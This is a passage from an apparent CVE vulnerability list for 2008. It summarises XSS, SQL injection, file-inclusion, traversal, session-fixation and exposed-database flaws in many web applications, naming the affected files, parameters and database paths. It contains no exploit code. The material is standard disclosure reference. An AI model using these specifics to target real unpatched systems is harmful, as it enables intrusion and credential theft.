data/8690BAK.mdb. [CVE-2008-6144] Multiple cross-site scripting (XSS) vulnerabilities in the WEC Discussion Forum (wec_discussion) extension 1.7.0 and earlier for TYPO3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different issue than CVE-2008-3029. [CVE-2008-6139] Directory traversal vulnerability in faqsupport/wce.download.php in WebBiscuits Modules Controller 1.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the download parameter. [CVE-2008-6138] PHP remote file inclusion vulnerability in adminhead.php in WebBiscuits Modules Controller 1.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the path[docroot] parameter. [CVE-2008-6135] Cross-site scripting (XSS) vulnerability in EveryBlog 5.x and 6.x, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-6131] Session fixation vulnerability in moziloWiki 1.0.1 and earlier allows remote attackers to hijack web sessions by setting the PHPSESSID parameter. [CVE-2008-6130] Cross-site scripting (XSS) vulnerability in index.php in moziloWiki 1.0.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) action and (2) page parameters. [CVE-2008-6128] Session fixation vulnerability in moziloCMS 1.10.2 and earlier allows remote attackers to hijack web sessions by setting the PHPSESSID parameter. [CVE-2008-6127] Multiple cross-site scripting (XSS) vulnerabilities in moziloCMS 1.10.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) page and (2) query parameters to (a) index.php, (3) cat and (4) file parameters to (b) download.php, (5) gal parameter to gallery.php, and the (6) URL to admin/login.php. [CVE-2008-6125] Unspecified vulnerability in the user editing interface in Moodle 1.5.x, 1.6 before 1.6.6, and 1.7 before 1.7.3 allows remote authenticated users to gain privileges via unknown vectors. [CVE-2008-6113] Cross-site scripting (XSS) vulnerability in SemanticScuttle before 0.90 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to the (1) username and (2) profile page. [CVE-2008-6108] Cross-site scripting (XSS) vulnerability in result.php in Galatolo WebManager (GWM) 1.0 allows remote attackers to inject arbitrary web script or HTML via the key parameter. [CVE-2008-6106] Cross-site request forgery (CSRF) vulnerability in IBM Workplace for Business Controls and Reporting 2.x and IBM Workplace Web Content Management 6.x has unknown impact and remote attack vectors. NOTE: some of these details are obtained from third party information. [CVE-2008-6105] Cross-site scripting (XSS) vulnerability in IBM Workplace for Business Controls and Reporting 2.x and IBM Workplace Web Content Management 6.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: some of these details are obtained from third party information. [CVE-2008-6101] SQL injection vulnerability in click.php in Adult Banner Exchange Website allows remote attackers to execute arbitrary SQL commands via the targetid parameter. [CVE-2008-6097] Multiple cross-site scripting (XSS) vulnerabilities in WikyBlog before 1.7.1 allow remote attackers to inject arbitrary web script or HTML via the (1) key parameter to index.php/Special/Main/keywordSearch, (2) revNum parameter to index.php/Edit/Main/Home, (3) to parameter to index.php/Special/Main/WhatLinksHere, (4) user parameter to index.php/Special/Main/UserEdits, and (5) the PATH_INFO to index.php. [CVE-2008-6095] Cross-site scripting (XSS) vulnerability in surveillanceView.htm in OpenNMS 1.5.94 allows remote attackers to inject arbitrary web script or HTML via the viewName parameter. [CVE-2008-6094] Cross-site scripting (XSS) vulnerability in user.do in Celoxis Technologies Celoxis allows remote attackers to inject arbitrary web script or HTML via the ni.smessage parameter. [CVE-2008-6087] Cross-site scripting (XSS) vulnerability in topic.php in Camera Life 2.6.2b4 allows remote attackers to inject arbitrary web script or HTML via the name parameter. [CVE-2008-6066] Multiple PHP remote file inclusion vulnerabilities in Meet#Web 0.8 allow remote attackers to execute arbitrary PHP code via a URL in the root_path parameter to (1) modules.php, (2) ManagerResource.class.php, (3) ManagerRightsResource.class.php, (4) RegForm.class.php, (5) RegResource.class.php, and (6) RegRightsResource.class.php in classes/. NOTE: the provenance of this information is unknown [CVE-2008-6062] Cross-site scripting (XSS) vulnerability in ActionScript in arbitrary Shockwave Flash (SWF) files created by Adobe Dreamweaver, when the Insert Flash Video feature is used, allows remote attackers to inject arbitrary web script or HTML via an asfunction: URI in the skinName parameter. NOTE: this may overlap CVE-2007-6242, CVE-2007-6244, or CVE-2007-6637. [CVE-2008-6059] xml/XMLHttpRequest.cpp in WebCore in WebKit before r38566 does not properly restrict access from web pages to the (1) Set-Cookie and (2) Set-Cookie2 HTTP response headers, which allows remote attackers to obtain sensitive information from cookies via XMLHttpRequest calls, related to the HTTPOnly protection mechanism. [CVE-2008-6057] Doug Luxem Liberum Help Desk 0.97.3 stores db/helpdesk2000.mdb under the web root with insufficient access control, which allows remote attackers to obtain passwords via a direct request. [CVE-2008-6056] Multiple cross-site scripting (XSS) vulnerabilities in World Recipe 2.11 allow remote attackers to inject arbitrary web script or HTML via the (1) n parameter to emailrecipe.aspx, (2) id parameter to recipedetail.aspx, and the (3) catid parameter to validatefieldlength.aspx. [CVE-2008-6055] PreProjects Pre Classified Listings stores pclasp.mdb under the web root with insufficient access control, which allows remote attackers to obtain passwords via a direct request. [CVE-2008-6054] PreProjects Pre Courier and Cargo Business stores dbcourior.mdb under the web root with insufficient access control, which allows remote attackers to obtain passwords via a direct request. [CVE-2008-6053] PreProjects Pre Resume Submitter stores onlineresume.mdb under the web root with insufficient access control, which allows remote attackers to obtain passwords via a direct request. [CVE-2008-6052] PreProjects Pre E-Learning Portal stores db_elearning.mdb under the web root with insufficient access control, which allows remote attackers to obtain passwords via a direct request. [CVE-2008-6051] MetaCart Free stores metacart.mdb under the web root with insufficient access control, which allows remote attackers to obtain usernames and passwords via a direct request. [CVE-2008-6047] Cross-site scripting (XSS) vulnerability in ADbNewsSender before 1.5.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to (1) subscribing and (2) unsubscribing. [CVE-2008-6045] Session fixation vulnerability in shopping_cart.php in xt:Commerce 3.0.4 and earlier allows remote attackers to hijack web sessions by setting the XTCsid parameter. [CVE-2008-6044] Cross-site scripting (XSS) vulnerability in advanced_search_result.php in xt:Commerce 3.0.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the keywords parameter. [CVE-2008-6041] Multiple cross-site scripting (XSS) vulnerabilities in Index.asp in Dataspade 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) ViewName, (2) TableName, (3) OrderBy, and (4) FilterField parameters. [CVE-2008-6039] Session fixation vulnerability in BLUEPAGE CMS 2.5 and earlier allows remote attackers to hijack web sessions by setting the PHPSESSID parameter. [CVE-2008-6035] Cross-site scripting (XSS) vulnerability in dispatch.php in Achievo 1.3.2-STABLE allows remote attackers to inject arbitrary web script or HTML via the atknodetype parameter. [CVE-2008-6034] Cross-site scripting (XSS) vulnerability in dispatch.php in Achievo 1.3.2 allows remote attackers to inject arbitrary web script or HTML via the atkaction parameter. NOTE: the provenance of this information is unknown [CVE-2008-6027] Multiple cross-site scripting (XSS) vulnerabilities in index.php in BLUEPAGE CMS 2.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) whl, (2) var_1, and (3) search parameters. [CVE-2008-6008] hyBook Guestbook Script stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing a password via a direct request for hyBook.mdb. [CVE-2008-6005] Multiple buffer overflows in the CheckUniqueName function in W3C Amaya Web Browser 10.0.1, and possibly other versions including 11.0.1, might allow remote attackers to execute arbitrary code via "duplicated" attribute value inputs. [CVE-2008-6004] Cross-site scripting (XSS) vulnerability in search.php in AJ Auction Pro Platinum 2 allows remote attackers to inject arbitrary web script or HTML via the product parameter. [CVE-2008-6002] Absolute path traversal vulnerability in sendfile.php in web-cp 0.5.7, when register_globals is enabled, allows remote attackers to read arbitrary files via a full pathname in the filelocation parameter. [CVE-2008-5999] Cross-site scripting (XSS) vulnerability in the Ajax Checklist module 5.x before 5.x-1.1 for Drupal allows remote authenticated users, with create and edit permissions for posts, to inject arbitrary web script or HTML via unspecified vectors involving the ajax_checklist filter. [CVE-2008-5996] Cross-site scripting (XSS) vulnerability in the Simplenews module 5.x before 5.x-1.5 and 6.x before 6.x-1.0-beta4, a module for Drupal, allows remote authenticated users, with "administer taxonomy" permissions, to inject arbitrary web script or HTML via a Newsletter category field. [CVE-2008-5995] Cross-site scripting (XSS) vulnerability in the freeCap CAPTCHA (sr_freecap) extension before 1.0.4 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-5994] Cross-site scripting (XSS) vulnerability in index.php in Check Point Connectra NGX R62 HFA_01 allows remote attackers to inject arbitrary web script or HTML via the dir parameter. NOTE: the provenance of this information is unknown [CVE-2008-5987] Untrusted search path vulnerability in the Python interface in Eye of GNOME (eog) 2.22.3, and possibly other versions, allows local users to execute arbitrary code via a Trojan horse Python file in the current working directory, related to a vulnerability in the PySys_SetArgv function (CVE-2008-5983). [CVE-2008-5985] Untrusted search path vulnerability in the Python interface in Epiphany 2.22.3, and possibly other versions, allows local users to execute arbitrary code via a Trojan horse Python file in the current working directory, related to a vulnerability in the PySys_SetArgv function (CVE-2008-5983). [CVE-2008-5981] PacPoll 4.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for (1) poll.mdb or (2) poll97.mdb. [CVE-2008-5980] Ocean12 Mailing List Manager Gold stores sensitive data under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for o12mail.mdb. [CVE-2008-5979] Cross-site scripting (XSS) vulnerability in default.asp in Ocean12 Mailing List Manager Gold allows remote attackers to inject arbitrary web script or HTML via the Email parameter. [CVE-2008-5977] SQL injection vulnerability in siteadmin/forgot.php in PHP JOBWEBSITE PRO allows remote attackers to execute arbitrary SQL commands via the adname parameter in a Submit action. [CVE-2008-5976] Multiple cross-site scripting (XSS) vulnerabilities in siteadmin/forgot.php in PHP JOBWEBSITE PRO allow remote attackers to inject arbitrary web script or HTML via (1) the adname parameter in a Submit action or (2) the UserName field. [CVE-2008-5973] SQL injection vulnerability in login.aspx in Active Web Mail 4.0 allows remote attackers to execute arbitrary SQL commands via the password parameter. [CVE-2008-5971] Cross-site scripting (XSS) vulnerability in profile_social.php in i-Net Solution Orkut Clone allows remote authenticated users to inject arbitrary web script or HTML via the id parameter. [CVE-2008-5967] admin/index.php in PHP iCalendar 2.3.4, 2.24, and earlier does not require administrative authentication for an addupdate action, which allows remote attackers to upload a calendar (aka .ics) file with arbitrary content to the calendars/ directory outside the web root. [CVE-2008-5964] Session fixation vulnerability in Social ImpressCMS before 1.1.1 RC1 allows remote attackers to hijack web sessions by setting the PHPSESSID parameter. [CVE-2008-5961] Cross-site scripting (XSS) vulnerability in index.php in Tribiq CMS Community 5.0.10B and 5.0.11E allows remote attackers to inject arbitrary web script or HTML via the cID parameter in a document action. NOTE: the provenance of this information is unknown [CVE-2008-5956] Wbstreet (aka PHPSTREET Webboard) 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain database credentials via a direct request to connect.inc. [CVE-2008-5955] SQL injection vulnerability in show.php in Wbstreet (aka PHPSTREET Webboard) 1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter. [CVE-2008-5951] ASP Template Creature stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for workDB/templatemonster.mdb. [CVE-2008-5944] Cross-site scripting (XSS) vulnerability in modules.php in NavBoard 16 (2.6.0) allows remote attackers to inject arbitrary web script or HTML via the module parameter. [CVE-2008-5942] Multiple cross-site scripting (XSS) vulnerabilities in MODx before 0.9.6.3 allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) the preserveUrls function and (2) "username input." NOTE: vector 2 may be related to CVE-2008-5939. [CVE-2008-5939] Cross-site scripting (XSS) vulnerability in index.php in MODx CMS 0.9.6.2 and earlier allows remote attackers to inject arbitrary web script or HTML via a JavaScript event in the username field, possibly related to snippet.ditto.php. NOTE: some sources list the id parameter as being affected, but this is probably incorrect based on the original disclosure. [CVE-2008-5935] Facto stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing the password via a direct request for database/facto.mdb. NOTE: some of these details are obtained from third party information. [CVE-2008-5934] SQL injection vulnerability in index.php in CMS ISWEB 3.0 allows remote attackers to execute arbitrary SQL commands via the id_sezione parameter. [CVE-2008-5933] Multiple cross-site scripting (XSS) vulnerabilities in index.php in CMS ISWEB 3.0 allow remote attackers to inject arbitrary web script or HTML via (1) the strcerca parameter (aka the input field for the cerca action) or (2) the id_oggetto parameter. NOTE: some of these details are obtained from third party information. [CVE-2008-5932] CodeAvalanche FreeForum stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing the password via a direct request for _private/CAForum.mdb. NOTE: some of these details are obtained from third party information. [CVE-2008-5931] The Net Guys ASPired2Blog stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing usernames and passwords via a direct request for admin/blog.mdb. NOTE: some of these details are obtained from third party information. [CVE-2008-5929] VP-ASP Shopping Cart 6.50 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database containing the password via a direct request for database/shopping650.mdb. NOTE: some of these details are obtained from third party information. [CVE-2008-5925] ASP-DEv XM Events Diary stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for diary.mdb. [CVE-2008-5920] The create_anchors function in utils.inc in WebSVN 1.x allows remote attackers to execute arbitrary PHP code via a crafted username that is processed by the preg_replace function with the eval switch. [CVE-2008-5919] Directory traversal vulnerability in rss.php in WebSVN 2.0 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to overwrite arbitrary files via directory traversal sequences in the rev parameter. [CVE-2008-5918] Cross-site scripting (XSS) vulnerability in the getParameterisedSelfUrl function in index.php in WebSVN 2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. [CVE-2008-5917] Cross-site scripting (XSS) vulnerability in the XSS filter (framework/Text_Filter/Filter/xss.php) in Horde Application Framework 3.2.2 and 3.3, when Internet Explorer is being used, allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to style attributes. [CVE-2008-5916] gitweb/gitweb.perl in gitweb in Git 1.6.x before 1.6.0.6, 1.5.6.x before 1.5.6.6, 1.5.5.x before 1.5.5.6, 1.5.4.x before 1.5.4.7, and other versions after 1.4.3 allows local repository owners to execute arbitrary commands by modifying the diff.external configuration variable and executing a crafted gitweb query. [CVE-2008-5915] An unspecified function in the JavaScript implementation in Google Chrome creates and exposes a "temporary footprint" when there is a current login to a web site, which makes it easier for remote attackers to trick a user into acting upon a spoofed pop-up message, aka an "in-session phishing attack." NOTE: as of 20090116, the only disclosure is a vague pre-advisory with no actionable information. However, because it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes. [CVE-2008-5914] An unspecified function in the JavaScript implementation in Apple Safari creates and exposes a "temporary footprint" when there is a current login to a web site, which makes it easier for remote attackers to trick a user into acting upon a spoofed pop-up message, aka an "in-session phishing attack." NOTE: as of 20090116, the only disclosure is a vague pre-advisory with no actionable information. However, because it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes. [CVE-2008-5912] An unspecified function in the JavaScript implementation in Microsoft Internet Explorer creates and exposes a "temporary footprint" when there is a current login to a web site, which makes it easier for remote attackers to trick a user into acting upon a spoofed pop-up message, aka an "in-session phishing attack." NOTE: as of 20090116, the only disclosure is a vague pre-advisory with no actionable information. However, because it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes. [CVE-2008-5901] iyzi Forum 1.0 beta 3 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing a password via a direct request for db/iyziforum.mdb. NOTE: some of these details are obtained from third party information. [CVE-2008-5900] CodeAvalanche Articles stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing the administrator password via a direct request for _private/CAArticles.mdb. NOTE: some of these details are obtained from third party information. [CVE-2008-5899] CodeAvalanche FreeForAll stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing the administrator password via a direct request for _private/CAFFAPage.mdb. NOTE: some of these details are obtained from third party information. [CVE-2008-5898] CodeAvalanche Directory stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing the administrator password via a direct request for _private/CADirectory.mdb. NOTE: some of these details are obtained from third party information. [CVE-2008-5897] CodeAvalanche FreeWallpaper stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing the administrator password via a direct request for _private/CAFreeWallpaper.mdb. NOTE: some of these details are obtained from third party information. [CVE-2008-5896] CodeAvalanche RateMySite stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing the administrator password via a direct request for _private/CARateMySite.mdb. NOTE: some of these details are obtained from third party information. [CVE-2008-5893] Cross-site scripting (XSS) vulnerability in admin_dblayers.asp in ClickAndEmail allows remote attackers to inject arbitrary web script or HTML via the tablename parameter in an update action. [CVE-2008-5891] Cross-site scripting (XSS) vulnerability in the profile editing functionality in Injader before 2.1.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: some of these details are obtained from third party information. [CVE-2008-5889] Cross-site scripting (XSS) vulnerability in user.asp in Click&Rank allows remote attackers to inject arbitrary web script or HTML via the action parameter. [CVE-2008-5886] TAKempis Discussion Web 4.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing a password via a direct request for _private/discussion.mdb. NOTE: some of these details are obtained from third party information. [CVE-2008-5885] The Net Guys ASPired2Quote stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing usernames and passwords via a direct request for admin/quote.mdb. NOTE: some of these details are obtained from third party information. [CVE-2008-5879] Cross-site scripting (XSS) vulnerability in index.php in Phpclanwebsite (aka PCW) 1.23.3 Fix Pack 5 and earlier, allows remote attackers to inject arbitrary web script or HTML via the page parameter and other unspecified vectors. [CVE-2008-5878] Multiple directory traversal vulnerabilities in Phpclanwebsite (aka PCW) 1.23.3 Fix Pack 5 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allow remote attackers to include and execute arbitrary files via a .. (dot dot) in the (1) boxname parameter to theme/superchrome/box.php and the (2) theme parameter to phpclanwebsite/footer.php. [CVE-2008-5877] Multiple SQL injection vulnerabilities in Phpclanwebsite (aka PCW) 1.23.3 Fix Pack 5 and earlier, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) page parameter to index.php, (2) form_id parameter to pcw/processforms.php, (3) pcwlogin and (4) pcw_pass parameters to pcw/setlogin.php, (5) searchvalue parameter to pcw/downloads.php, and the (6) searchvalue and (7) whichfield parameter to pcw/downloads.php, a different vector than CVE-2006-0444. [CVE-2008-5869] Cross-site scripting (XSS) vulnerability in the Proxim Wireless Tsunami MP.11 2411 with firmware 3.0.3 allows remote authenticated users to inject arbitrary web script or HTML via the system.sysName.0 SNMP OID. [CVE-2008-5862] Directory traversal vulnerability in webcamXP 5.3.2.375 and 5.3.2.410 build 2132 allows remote attackers to read arbitrary files via a ..%2F (encoded dot dot slash) in the URI. [CVE-2008-5858] Multiple cross-site scripting (XSS) vulnerabilities in KnowledgeTree before 3.5.4a allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different issue than CVE-2007-4281. [CVE-2008-5855] myPHPscripts Login Session 2.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to discover usernames, e-mail addresses, and password hashes via a direct request for users.txt. [CVE-2008-5854] Multiple cross-site scripting (XSS) vulnerabilities in login.php in myPHPscripts Login Session 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) ls_user and (2) ls_email parameters (aka the User form) in an ls_register action. NOTE: some of these details are obtained from third party information. [CVE-2008-5853] Chilek Content Management System (aka ChiCoMaS) 2.0.4 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to (1) obtain database credentials via a direct request for config.inc or (2) read database backups via a request for a backup/ URI. [CVE-2008-5852] Emefa Guestbook 3.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for guestbook.mdb. [CVE-2008-5845] Multiple cross-site scripting (XSS) vulnerabilities in Six Apart Movable Type (MT) before 4.23 allow remote attackers to inject arbitrary web script or HTML via a (1) MTEntryAuthorUsername, (2) MTAuthorDisplayName, (3) MTEntryAuthorDisplayName, or (4) MTCommenterName field in a Profile View template [CVE-2008-5842] Multiple cross-site scripting (XSS) vulnerabilities in Fujitsu-Siemens WebTransactions 7.0, 7.1, and possibly other versions allow remote attackers to inject arbitrary web script or HTML via vectors associated with (1) a demo application shipped with WebTransactions and possibly (2) an unspecified "dynamic application." [CVE-2008-5825] The SmartPoster implementation on the Nokia 6131 Near Field Communication (NFC) phone with 05.12 firmware does not properly display the URI record when the Title record contains a certain combination of space, CR (aka \r), and . (dot) characters, which allows remote attackers to trick a user into loading an arbitrary URI via a crafted NDEF tag, as demonstrated by (1) an http: URI for a malicious web site, (2) a tel: URI for a premium-rate telephone number, and (3) an sms: URI that triggers purchase of a ringtone. [CVE-2008-5821] Memory leak in WebKit.dll in WebKit, as used by Apple Safari 3.2 on Windows Vista SP1, allows remote attackers to cause a denial of service (memory consumption and browser crash) via a long ALINK attribute in a BODY element in an HTML document. [CVE-2008-5817] Multiple SQL injection vulnerabilities in index.php in Web Scribble Solutions webClassifieds 2005 allow remote attackers to execute arbitrary SQL commands via the (1) user and (2) password fields in a sign_in action. [CVE-2008-5814] Cross-site scripting (XSS) vulnerability in PHP, possibly 5.2.7 and earlier, when display_errors is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: because of the lack of details, it is unclear whether this is related to CVE-2006-0208. [CVE-2008-5810] WBPublish (aka WBPublish.exe) in Fujitsu-Siemens WebTransactions 7.0, 7.1, and possibly other versions allows remote attackers to execute arbitrary commands via shell metacharacters in input that is sent through HTTP and improperly used during temporary session data cleanup, possibly related to (1) directory names, (2) template names, and (3) session IDs. [CVE-2008-5807] Multiple cross-site scripting (XSS) vulnerabilities in TestLink before 1.8 RC1 allow remote attackers to inject arbitrary web script or HTML via (1) Testproject Names and (2) Testplan Names in planEdit.php, and possibly (3) Testcaseprefixes in projectview.tpl. [CVE-2008-5799] Cross-site scripting (XSS) vulnerability in the Wir ber uns (fsmi_people) extension 0.0.24 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-5795] Cross-site scripting (XSS) vulnerability in the eluna Page Comments (eluna_pagecomments) extension 1.1.2 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-5786] Cross-site scripting (XSS) vulnerability in the Silva Find extension 1.1.5 and earlier in Silva 1.x before 1.6.3.2, Silva 2.0 before 2.0.12.2, and Silva 2.1 before 2.1.0.2 allows remote attackers to inject arbitrary web script or HTML via the fulltext parameter. [CVE-2008-5780] Forest Blog 1.3.2 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing passwords via a direct request for blog.mdb. [CVE-2008-5773] Nukedit 4.9.8 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing usernames and passwords via a direct request for database/dbsite.mdb. [CVE-2008-5770] Cross-site scripting (XSS) vulnerability in config/make_config.php in PHP Weather 2.2.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. [CVE-2008-5769] Multiple cross-site scripting (XSS) vulnerabilities in Kerio MailServer before 6.6.2 allow remote attackers to inject arbitrary web script or HTML via the (1) folder parameter to mailCompose.php or the (2) daytime parameter to calendarEdit.php. NOTE: some of these details are obtained from third party information. [CVE-2008-5765] WorkSimple 1.2.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing usernames and passwords via a direct request for data/usr.txt. [CVE-2008-5762] Simple Text-File Login Script (SiTeFiLo) 1.0.6 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing the password via a direct request for slog_users.txt. [CVE-2008-5761] Multiple cross-site scripting (XSS) vulnerabilities in FlatnuX CMS (aka Flatnuke3) 2008-12-11 allow remote attackers to inject arbitrary web script or HTML via (1) the mod parameter to the default URI [CVE-2008-5760] Cross-site scripting (XSS) vulnerability in error413.php in Kerio MailServer before 6.6.2 allows remote attackers to inject arbitrary web script or HTML via the sent parameter. NOTE: some of these details are obtained from third party information. [CVE-2008-5759] Cross-site scripting (XSS) vulnerability in FlatnuX CMS (aka Flatnuke3) 2008-12-11 allows remote attackers to inject arbitrary web script or HTML via the name parameter in an updaterecord action to index.php in the 08_Files module. NOTE: the provenance of this information is unknown [CVE-2008-5757] Cross-site scripting (XSS) vulnerability in textarea/index.php in Textpattern (aka Txp CMS) 4.0.6 and earlier allows remote authenticated users to inject arbitrary web script or HTML via the Body parameter in an article action. NOTE: some of these details are obtained from third party information. [CVE-2008-5751] SQL injection vulnerability in index.php in AlstraSoft Web Email Script Enterprise (ESE) allows remote attackers to execute arbitrary SQL commands via the id parameter in a directory action. [CVE-2008-5742] Multiple open redirect vulnerabilities in AIST NetCat 3.12 and earlier allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via (1) the redirect parameter in a logoff action to modules/auth/index.php or (2) the url parameter to modules/linkmanager/redirect.php. NOTE: this was reported within an "HTTP Response Splitting" section in the original disclosure. [CVE-2008-5734] Cross-site scripting (XSS) vulnerability in WebMail Pro in IceWarp Software Merak Mail Server 9.3.2 allows remote attackers to inject arbitrary web script or HTML via an IMG element in an HTML e-mail message. [CVE-2008-5729] Multiple cross-site scripting (XSS) vulnerabilities in AIST NetCat 3.12 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) form and (2) control parameters to FCKeditor/neditor.php, and the (3) path parameter to admin/siteinfo/iframe.inc.php. [CVE-2008-5720] Cross-site scripting (XSS) vulnerability in Mayaa before 1.1.23 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving the default error page for the org.seasar.mayaa.impl.engine.PageNotFoundException exception and possibly other exceptions. [CVE-2008-5719] Cross-site scripting (XSS) vulnerability in Hitachi Groupmax Web Workflow SDK Set for Active Server Pages before 06-52-/C and Hitachi Groupmax Workflow - Development Kit for Active Server Pages before 06-52-/A allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-5717] Cross-site scripting (XSS) vulnerability in Hitachi JP1/Integrated Management - Service Support 08-10 through 08-10-05, 08-11 through 08-11-03, and 08-50 through 08-50-03 on Windows allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-5707] SQL injection vulnerability in urunler.asp in Iltaweb Alisveris Sistemi allows remote attackers to execute arbitrary SQL commands via the catno parameter. [CVE-2008-5682] Cross-site scripting (XSS) vulnerability in Opera before 9.63 allows remote attackers to inject arbitrary web script or HTML via built-in XSLT templates. [CVE-2008-5679] The HTML parsing engine in Opera before 9.63 allows remote attackers to execute arbitrary code via crafted web pages that trigger an invalid pointer calculation and heap corruption. [CVE-2008-5678] Fretwell-Downing Informatics (FDI) OLIB7 WebView 2.5.1.1 allows remote authenticated users to obtain sensitive information from files via the infile parameter to the default URI under cgi/, as demonstrated by the (1) get_settings.ini, (2) setup.ini, and (3) text.ini files. [CVE-2008-5677] Unrestricted file upload vulnerability in Kwalbum 2.0.4, 2.0.2, and earlier, when PICS_PATH is located in the web root, allows remote authenticated users with upload capability to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file under items/, related to the ReplaceBadFilenameChars function in include/ItemAdder.php. NOTE: some of these details are obtained from third party information. [CVE-2008-5675] Unspecified vulnerability in IBM WebSphere Portal 6.0 before 6.0.1.5 has unknown impact and attack vectors related to "Access problems with BasicAuthTAI." [CVE-2008-5674] Multiple array index errors in the HTTP server in Darkwet Network webcamXP 3.72.440.0 and earlier and beta 4.05.280 and earlier allow remote attackers to cause a denial of service (device crash) and read portions of memory via (1) an invalid camnum parameter to the pocketpc component and (2) an invalid id parameter to the show_gallery_pic component. [CVE-2008-5668] Multiple cross-site scripting (XSS) vulnerabilities in Textpattern (aka Txp CMS) 4.0.5 allow remote attackers to inject arbitrary web script or HTML via (1) the PATH_INFO to setup/index.php or (2) the name parameter to index.php in the comments preview section. [CVE-2008-5656] Cross-site scripting (XSS) vulnerability in the frontend plugin for the felogin system extension in TYPO3 4.2.0, 4.2.1 and 4.2.2 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2008-5650] SQL injection vulnerability in the login directory in AlstraSoft Web Host Directory allows remote attackers to execute arbitrary SQL commands via the pwd parameter. [CVE-2008-5644] Cross-site scripting (XSS) vulnerability in the file backend module in TYPO3 4.2.2 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2008-5631] SQL injection vulnerability in start.asp in Active eWebquiz 8.0 allows remote attackers to execute arbitrary SQL commands via the (1) useremail parameter (aka username field) or the (2) password parameter. NOTE: some of these details are obtained from third party information. [CVE-2008-5620] RoundCube Webmail (roundcubemail) before 0.2-beta allows remote attackers to cause a denial of service (memory consumption) via crafted size parameters that are used to create a large quota image. [CVE-2008-5619] html2text.php in Chuggnutt HTML to Text Converter, as used in RoundCube Webmail (roundcubemail) 0.2-1.alpha and 0.2-3.beta, Mahara, and AtMail Open 1.03, allows remote attackers to execute arbitrary code via crafted input that is processed by the preg_replace function with the eval switch. [CVE-2008-5608] ASP AutoDealer stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for auto.mdb. [CVE-2008-5606] Gazatem QMail Mailing List Manager 1.2 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for qmail.mdb. [CVE-2008-5603] ASPTicker 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for news.mdb. [CVE-2008-5602] Natterchat 1.12 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for natterchat112.mdb. [CVE-2008-5601] User Engine Lite ASP stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for users.mdb. [CVE-2008-5600] Merlix Teamworx Server stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for teamworx.mdb. [CVE-2008-5597] Cold BBS stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for 